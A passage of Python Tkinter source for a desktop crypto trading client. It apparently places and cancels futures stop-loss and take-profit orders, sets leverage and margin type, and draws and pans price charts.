self.graph_Td.configure(scrollregion=(-500,0,1000,70))
#Vert Volume scale graph - Volumes
self.graph_VV = Canvas(root, borderwidth=2,bg="white")
self.graph_VV.place(height=100,width=510,x=10,y=450)
self.graph_VV.configure(scrollregion=(-500,0,1000,100))
#BTC/USDT delta
self.graph_BTCD = Canvas(root, borderwidth=2,bg="white")
self.graph_BTCD.place(height=100,width=510,x=10,y=180)
self.graph_BTCD.configure(scrollregion=(-500,0,1000,100))
#Zoom button
self.button_Ord = Button(root, text="Zoom", command=click_button_Zm)
self.button_Ord.place(height=30,width=100,x=410,y=150)
#Start/stop button
self.button_OrdTmr = Button(root, text="Start", command=click_button_OrdTmr)
self.button_OrdTmr.place(height=30,width=100,x=510,y=150)
#Graphs BINDS
self.graph_1.bind("<ButtonPress-1>", self.button1_press)
self.graph_1.bind("<ButtonRelease-1>",self.button1_release)
self.graph_Cn.bind("<ButtonPress-1>", self.button10_press)
self.graph_Cn.bind("<ButtonRelease-1>",self.button10_release)
self.graph_Sm.bind("<ButtonPress-1>", self.buttonSm_press)
self.graph_Sm.bind("<ButtonRelease-1>",self.buttonSm_release)
self.graph_Zm.bind("<ButtonRelease-1>",self.buttonZm_release)
self.Scale_TP.bind("<MouseWheel>",self.Scale_TP_MW)
self.Scale_SL.bind("<MouseWheel>",self.Scale_SL_MW)
#_______________MIDDLE SIDE END
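# Append a timestamped message to the system-log text box and keep it scrolled to the newest line.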
def Sys_Msg(self,text1):
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + text1
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
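# Order-size radio handler: values above 1 are USDT amounts (divided by the current leverage), fractional values are a share of the available futures USDT balance; the result is written into the Qty box.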
def OrdSz_Ch(self,i):
global OrdSz
OrdSz.set(i)
app.text_QOrd.delete(1.0,END)
if i > 1:
k1 = "%.1f" % (float(float(i)/float(Lvrg)))
app.text_QOrd.insert(1.0, k1)
else:
BnFAcc = bot.futuresBalance()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if BnFAcc1['asset'] == 'USDT':
wa = float(BnFAcc1['withdrawAvailable'])
wa = wa*i
app.text_QOrd.insert(1.0, "%.2f" % (wa))
#print(OrdSz.get())
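# Position-side toggle (LONG/SHORT): swaps the colors of the TP/SL sliders and of their Set/X buttons to match the selected side.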
def PSDvar_Ch(self,i):
global PosSide
global PSDvar
PSDvar.set(i)
PosSide = i
if PosSide =='LONG':
app.Scale_TP.config(bg='lightgreen')
app.Scale_SL.config(bg='lightpink')
app.button_PSL.config (fg='red')
app.button_PSLR.config(fg='red')
app.button_PTP.config(fg='green')
app.button_PTPR.config(fg='green')
elif PosSide =='SHORT':
app.Scale_TP.config(bg='lightpink')
app.Scale_SL.config(bg='lightgreen')
app.button_PSL.config (fg='green')
app.button_PSLR.config(fg='green')
app.button_PTP.config(fg='red')
app.button_PTPR.config(fg='red')
#print(PosSide)
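# Replace the protective close order on the open futures position: cancel the existing STOP_MARKET (LONG) or TAKE_PROFIT_MARKET (SHORT) order and re-create it at the slider price, formatted to the symbol's tick size.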
def click_button_PSL(self):
global PEP,PSP_Tmp
global should_run_C
global prSt
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order Stop-Loss Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.1 > prSt >= 0.01:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.01 > prSt >= 0.001:
PSP_Tmp_str = "%.3f" % (PSP_Tmp)
elif 0.001 > prSt >= 0.0001:
PSP_Tmp_str = "%.4f" % (PSP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PSP_Tmp_str = "%.5f" % (PSP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PSP_Tmp_str = "%.6f" % (PSP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PSP_Tmp_str = "%.7f" % (PSP_Tmp)
elif prSt < 0.0000001:
PSP_Tmp_str = "%.8f" % (PSP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='LONG', type='STOP_MARKET', timeInForce='GTE_GTC', stopPrice=PSP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position LONG Order Stop-Loss Set [' + grSmb + '], Price: ' + str(PSP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Take-Profit Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.1 > prSt >= 0.01:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.01 > prSt >= 0.001:
PSP_Tmp_str = "%.3f" % (PSP_Tmp)
elif 0.001 > prSt >= 0.0001:
PSP_Tmp_str = "%.4f" % (PSP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PSP_Tmp_str = "%.5f" % (PSP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PSP_Tmp_str = "%.6f" % (PSP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PSP_Tmp_str = "%.7f" % (PSP_Tmp)
elif prSt < 0.0000001:
PSP_Tmp_str = "%.8f" % (PSP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='SHORT', type='TAKE_PROFIT_MARKET', timeInForce='GTE_GTC', stopPrice=PSP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position SHORT Order Take-Profit Set [' + grSmb + '], Price: ' + str(PSP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PSLR(self):
global PEP
global should_run_C
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_SL.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position Order Stop-Loss Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_SL.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Take-Profit Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PTP(self):
global PPP_Tmp
global should_run_C
global prSt
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order Take-Profit Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.1 > prSt >= 0.01:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.01 > prSt >= 0.001:
PPP_Tmp_str = "%.3f" % (PPP_Tmp)
elif 0.001 > prSt >= 0.0001:
PPP_Tmp_str = "%.4f" % (PPP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PPP_Tmp_str = "%.5f" % (PPP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PPP_Tmp_str = "%.6f" % (PPP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PPP_Tmp_str = "%.7f" % (PPP_Tmp)
elif prSt < 0.0000001:
PPP_Tmp_str = "%.8f" % (PPP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='LONG', type='TAKE_PROFIT_MARKET', timeInForce='GTE_GTC', stopPrice=PPP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position LONG Order Take-Profit Set [' + grSmb + '], Price: ' + str(PPP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Stop-Loss Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.1 > prSt >= 0.01:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.01 > prSt >= 0.001:
PPP_Tmp_str = "%.3f" % (PPP_Tmp)
elif 0.001 > prSt >= 0.0001:
PPP_Tmp_str = "%.4f" % (PPP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PPP_Tmp_str = "%.5f" % (PPP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PPP_Tmp_str = "%.6f" % (PPP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PPP_Tmp_str = "%.7f" % (PPP_Tmp)
elif prSt < 0.0000001:
PPP_Tmp_str = "%.8f" % (PPP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='SHORT', type='STOP_MARKET', timeInForce='GTE_GTC', stopPrice=PPP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position SHORT Order Stop-Loss Set [' + grSmb + '], Price: ' + str(PPP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PTPR(self):
global PEP
global should_run_C
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_TP.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order Take-Profit Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_TP.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Stop-Loss Removed [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def Scale_TP_MW(self,event):
#print ('MW', event.num, event.delta)
if event.num == 5 or event.delta <= -120:
app.Scale_TP.set(app.Scale_TP.get()-0.1)
if event.num == 4 or event.delta >= 120:
app.Scale_TP.set(app.Scale_TP.get()+0.1)
def Scale_SL_MW(self,event):
#print ('MW', event.num, event.delta)
if event.num == 5 or event.delta <= -120:
app.Scale_SL.set(app.Scale_SL.get()-0.1)
if event.num == 4 or event.delta >= 120:
app.Scale_SL.set(app.Scale_SL.get()+0.1)
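# Vertical zoom selector: maps the chosen +/-% option to the zoom value grZm and, when a candle chart timer is running, restarts it so the chart is redrawn.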
def OptionCYP_selected(self,choice):
global grZm
global should_run_C
grZm_choice = choice
if grZm_choice == '-50%':
grZm = 50
elif grZm_choice == '-40%':
grZm = 100
elif grZm_choice == '-30%':
grZm = 200
elif grZm_choice == '-20%':
grZm = 300
elif grZm_choice == '-10%':
grZm = 400
elif grZm_choice == '0%':
grZm = 500
elif grZm_choice == '+10%':
grZm = 600
elif grZm_choice == '+20%':
grZm = 700
elif grZm_choice == '+30%':
grZm = 800
elif grZm_choice == '+40%':
grZm = 900
elif grZm_choice == '+50%':
grZm = 1000
if GS == 'CANDLE 1m' or GS == 'CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
if should_run_C == True:
#Stop Timer
should_run_C = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
time.sleep(0.5)
#Restart Timer
PS1 = False
t2 = threading.Thread(target=Timer_Candle,daemon=True)
t2.start()
app.button_1.config(text="Stop", fg='red')
should_run_C = True
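# Drag-to-pan handlers: remember the press coordinates and scroll the chart canvases by the drag distance on release.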
def button1_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def button1_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_1.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_1.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_VV.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_BTCD.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def button10_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def button10_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_Cn.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Cn.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def buttonSm_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def buttonSm_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_Sm.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Sm.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
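# Click on the zoom canvas: convert the Y coordinate back to a price (rounded to the tick size) and write it into the Price box.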
def buttonZm_release(self,event):
global SxF, SyF
global yI0Zm
global grH
SxF, SyF = event.x, event.y
grMd=grH/2
yy = yI0Zm +(((grMd - SyF)/25)*prSt)
#print (yy)
if prSt >= 1:
yy1 = "%.0f" % (yy)
yy2=float(yy1)
if prSt == 0.1:
yy1 = "%.1f" % (yy)
yy2=float(yy1)
#print(yy2)
elif prSt == 0.01:
yy1 = "%.2f" % (yy)
yy2=float(yy1)
#print(yy2)
elif prSt == 0.001:
yy1 = "%.3f" % (yy)
yy2=float(yy1)
elif prSt == 0.0001:
yy1 = "%.4f" % (yy)
yy2=float(yy1)
elif prSt == 0.00001:
yy1 = "%.5f" % (yy)
yy2=float(yy1)
elif prSt == 0.000001:
yy1 = "%.6f" % (yy)
yy2=float(yy1)
elif prSt == 0.0000001:
yy1 = "%.7f" % (yy)
yy2=float(yy1)
elif prSt == 0.00000001:
yy1 = "%.8f" % (yy)
yy2=float(yy1)
app.text_POrd.delete(1.0,END)
app.text_POrd.insert(1.0, yy2)
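# Pair selection changed: reload the symbol filters (tick size, max qty, step size) from the cached exchangeInfo and, for FUTURES, read the current leverage and margin type of the position.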
def CB_P_changed(self,event):
global SP
global grSmb
global prSt
global grSt
global grOW
global Lo
global Lvrg
global Lvrg_Tmp
global MrgT
global MrgT_Tmp
global Should_Chng
global orLSS
SP = self.CB_P.get()
self.label_P.config(text = SP)
tstr=''
orLSS=1
Should_Chng = False
if MS == 'SPOT':
tstr = 'SPOT'
MrgT='NONE'
MrgT_Tmp='NONE'
if len(myTuplEI1)>0 and len(mylistSP)>0:
for mm in range (len(mylistSP)):
if mylistSP[mm]['symbol'] == SP:
app.Tree_PI.item(1, values=('symbol',mylistSP[mm]['symbol']))
app.Tree_PI.item(2, values=('status',mylistSP[mm]['status']))
app.Tree_PI.item(3, values=('baseAsset',mylistSP[mm]['baseAsset']))
app.Tree_PI.item(4, values=('quoteAsset',mylistSP[mm]['quoteAsset']))
app.Tree_PI.item(5, values=('marginAsset','-'))
app.Tree_PI.item(6, values=('contractType','-'))
mylist10 = []
mylist10 = mylistSP[mm]['filters']
if len(mylist10)>0:
app.Tree_PI.item(7, values=('minPrice',mylist10[0]['minPrice']))
app.Tree_PI.item(8, values=('maxPrice',mylist10[0]['maxPrice']))
app.Tree_PI.item(9, values=('tickSize',mylist10[0]['tickSize']))
app.Tree_PI.item(10, values=('maxQty',mylist10[2]['maxQty']))
app.Tree_PI.item(11, values=('stepSize',mylist10[2]['stepSize']))
prSt = float(mylist10[0]['tickSize'])
grSt = 16
grOW = 1000
grOW = float(mylist10[5]['maxQty'])
Lo=0
grSmb = SP
elif MS == 'FUTURES':
tstr = 'FUTURES'
if len(myTuplEI2)>0 and len(mylistFT)>0:
for mm in range (len(mylistFT)):
if mylistFT[mm]['symbol'] == SP:
#print(mylistFT[mm])
app.Tree_PI.item(1, values=('symbol',mylistFT[mm]['symbol']))
app.Tree_PI.item(2, values=('status',mylistFT[mm]['status']))
app.Tree_PI.item(3, values=('baseAsset',mylistFT[mm]['baseAsset']))
app.Tree_PI.item(4, values=('quoteAsset',mylistFT[mm]['quoteAsset']))
app.Tree_PI.item(5, values=('marginAsset',mylistFT[mm]['marginAsset']))
app.Tree_PI.item(6, values=('contractType',mylistFT[mm]['contractType']))
mylist10 = []
mylist10 = mylistFT[mm]['filters']
if len(mylist10)>0:
prSt = float(mylist10[0]['tickSize'])
orLSS= float(mylist10[1]['stepSize'])
grSt = 16
grOW = 1000
grOW = float(mylist10[2]['maxQty'])
Lo=0
grSmb = SP
app.Tree_PI.item(7, values=('minPrice',mylist10[0]['minPrice']))
app.Tree_PI.item(8, values=('maxPrice',mylist10[0]['maxPrice']))
app.Tree_PI.item(9, values=('tickSize',mylist10[0]['tickSize']))
app.Tree_PI.item(10, values=('maxQty',mylist10[2]['maxQty']))
app.Tree_PI.item(11, values=('stepSize',mylist10[1]['stepSize']))
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
ss = 'FUTURES positions:\n'
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['positions']
if len(BnFAcc1)>0:
for mm in range(len(BnFAcc1)):
BnFAcc10 = BnFAcc1[mm]
if BnFAcc10['symbol']==grSmb:
#print (grSmb)
Lvrg=BnFAcc10['leverage']
Lvrg_Tmp = Lvrg
#print(Lvrg)
app.CB_Lvrg.set(Lvrg)
app.label_OrdAss.config(text = 'USDT x ' + str(Lvrg))
Isl=BnFAcc10['isolated']
if Isl == True:
app.CB_MrgT.set('ISOLATED')
MrgT='ISOLATED'
MrgT_Tmp=MrgT
elif Isl==False:
app.CB_MrgT.set('CROSSED')
MrgT='CROSSED'
MrgT_Tmp=MrgT
#print(bot.symbolLeverage(symbol=grSmb))
#print(bot.symbolMarginType(symbol=grSmb))
self.label_PI.config(text = tstr)
def CB_MrgT_changed(self,event):
global MrgT_Tmp
if MS == 'FUTURES':
MrgT_Tmp = app.CB_MrgT.get()
def CB_Lvrg_changed(self,event):
global Lvrg_Tmp
Lvrg_Tmp = app.CB_Lvrg.get()
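# Apply leverage/margin-type changes: refuse while there are open orders or a non-zero position for the pair, otherwise call futuresChLeverage / futuresChMarginType as needed.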
def click_button_MrLvSet(self):
#global Lvrg
#global MrgT
global Should_Chng
Should_Chng=False
MrgT_Tmp_B=False
Msg_Tmp=0
if MrgT_Tmp == 'ISOLATED':
MrgT_Tmp_B=True
else:
MrgT_Tmp_B=False
if MS == 'FUTURES':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb:
Should_Chng=False
Msg_Tmp=3
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['positions']
if len(BnFAcc1)>0:
for mm in range(len(BnFAcc1)):
BnFAcc10 = BnFAcc1[mm]
#if BnFAcc10['symbol']==grSmb:
# print(BnFAcc10['positionAmt'])
# print (float(BnFAcc10['leverage']),float(Lvrg_Tmp),BnFAcc10['isolated'],MrgT_Tmp_B,MrgT_Tmp)
if BnFAcc10['symbol']==grSmb and (float(BnFAcc10['positionAmt'])>0 or float(BnFAcc10['positionAmt'])<0):
Msg_Tmp=1
Should_Chng=False
elif BnFAcc10['symbol']==grSmb and float(BnFAcc10['positionAmt'])==0 and float(BnFAcc10['leverage']) == float(Lvrg_Tmp) and BnFAcc10['isolated'] == MrgT_Tmp_B and Msg_Tmp==0:
Msg_Tmp=2
Should_Chng=False
elif BnFAcc10['symbol']==grSmb and float(BnFAcc10['positionAmt'])==0 and (float(BnFAcc10['leverage']) != float(Lvrg_Tmp) or BnFAcc10['isolated'] != MrgT_Tmp_B) and Msg_Tmp==0:
Should_Chng=True
if BnFAcc10['isolated'] != MrgT_Tmp_B and float(BnFAcc10['leverage']) == float(Lvrg_Tmp):
Msg_Tmp=4
elif BnFAcc10['isolated'] == MrgT_Tmp_B and float(BnFAcc10['leverage']) != float(Lvrg_Tmp):
Msg_Tmp=5
elif BnFAcc10['isolated'] != MrgT_Tmp_B and float(BnFAcc10['leverage']) != float(Lvrg_Tmp):
Msg_Tmp=6
if Should_Chng==False and Msg_Tmp==1:
messagebox.showinfo("Set changes decline", "Есть открытые позиции по данной паре " + grSmb)
elif Should_Chng==False and Msg_Tmp==2:
messagebox.showinfo("Set changes decline", "Нет изменений по данной паре " + grSmb)
elif Should_Chng==False and Msg_Tmp==3:
messagebox.showinfo("Set changes decline", "Есть открытые ордера по данной паре " + grSmb)
#print (Should_Chng)
#print (Lvrg,Lvrg_Tmp,MrgT,MrgT_Tmp)
if Should_Chng==True:
if Msg_Tmp==5 or Msg_Tmp==6:
bot.futuresChLeverage(symbol=grSmb,leverage=int(Lvrg_Tmp))
messagebox.showinfo("Set changes leverage", "Плечо по данной паре " + grSmb + "установлено" + Lvrg_Tmp)
sys_msg = ' Кредитное плечо пары ' + grSmb + ' установлено x' + Lvrg_Tmp
app.Sys_Msg(text1=sys_msg)
if Msg_Tmp==4 or Msg_Tmp==6:
bot.futuresChMarginType(symbol=grSmb,marginType=MrgT_Tmp)
messagebox.showinfo("Set changes margin", "Маржа по данной паре " + grSmb + "установлена" + MrgT_Tmp)
sys_msg = ' Режим маржи пары ' + grSmb + ' установлен:' + MrgT_Tmp
app.Sys_Msg(text1=sys_msg)
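# Market selector (SPOT/FUTURES): adjust the margin-type and leverage comboboxes and rebuild the pair list.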
def market_selected(self,choice):
global MS
MS = choice
if MS == 'SPOT':
app.CB_MrgT['values'] = ('NONE',)
app.CB_MrgT.current(0)
MrgT='NONE'
app.CB_Lvrg['values'] = ('1',)
app.CB_Lvrg.current(0)
elif MS == 'FUTURES':
app.CB_MrgT['values'] = ('ISOLATED', 'CROSSED')
app.CB_MrgT.current(0)
MrgT='ISOLATED'
app.CB_Lvrg['values'] = ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20')
app.CB_Lvrg.current(0)
self.PL_make()
def graph_selected(self,choice):
global GS
GS = choice
wh = root.winfo_height()
ww = root.winfo_width()
if GS=='TICK':
app.graph_1.place(x=10,y=150,width=ww-490,height=wh-320)
app.graph_Sm.place_forget()
app.graph_Cn.place_forget()
app.graph_VV.place_forget()
app.graph_BTCD.place_forget()
elif GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
app.graph_1.place_forget()
app.graph_Sm.place_forget()
app.graph_Cn.place(x=10,y=150,width=ww-490,height=wh-320)
app.graph_VV.place(x=10,y=wh-300,width=ww-490,height=100)
app.graph_BTCD.place(x=10,y=180,width=ww-490,height=100)
elif GS=='CANDLE SUMM':
app.graph_1.place_forget()
app.graph_Cn.place_forget()
app.graph_VV.place_forget()
app.graph_BTCD.place_forget()
app.graph_Sm.place(x=10,y=150,width=ww-490,height=wh-320)
def pair_selected(self,choice):
global MPS
MPS = choice
if choice == 'All':
MPS = ''
elif choice == 'USDT':
MPS = 'USDT'
self.PL_make()
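# Rebuild the pair combobox values for the current market, optionally filtered to USDT-quoted symbols.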
def PL_make(self):
if MS == 'SPOT':
if MPS == '':
app.CB_P["values"] = mylist1
elif MPS == 'USDT':
mylist10 = []
for mm in range(len(mylistSP)):
if mylistSP[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistSP[mm]['symbol'])
app.CB_P["values"] = mylist10
elif MS == 'FUTURES':
if MPS == '':
app.CB_P["values"] = mylist2
elif MPS == 'USDT':
mylist10 = []
for mm in range(len(mylistFT)):
if mylistFT[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistFT[mm]['symbol'])
app.CB_P["values"] = mylist10
app.List_Ord.insert(END, 'sjdhsjhd') # debug placeholder entry
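# TP/SL sliders: convert the slider percent (leverage-adjusted PnL) into an absolute price and move the matching horizontal line on the candle canvas.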
def Scale_TP_change(self,value):
global GPPP_Tmp
global PPP_Tmp
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='LONG':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PPP_Tmp = yyC
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
app.graph_Cn.coords(GPPP_Tmp, -500,yyC,800,yyC)
